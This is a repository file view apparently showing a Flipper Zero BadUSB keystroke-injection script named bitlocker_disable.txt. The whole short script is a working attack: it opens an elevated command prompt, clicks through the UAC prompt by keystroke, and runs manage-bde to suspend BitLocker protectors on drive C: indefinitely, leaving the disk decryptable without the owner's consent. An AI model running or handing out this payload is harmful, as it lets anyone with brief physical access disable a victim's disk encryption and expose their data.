Files
Flipper/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
T

14 lines
233 B
Plaintext

REM launch command prompt as admin as fast as possible
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING manage-bde -protectors -Disable C: -RebootCount 0
ENTER
DELAY 500
ALT F4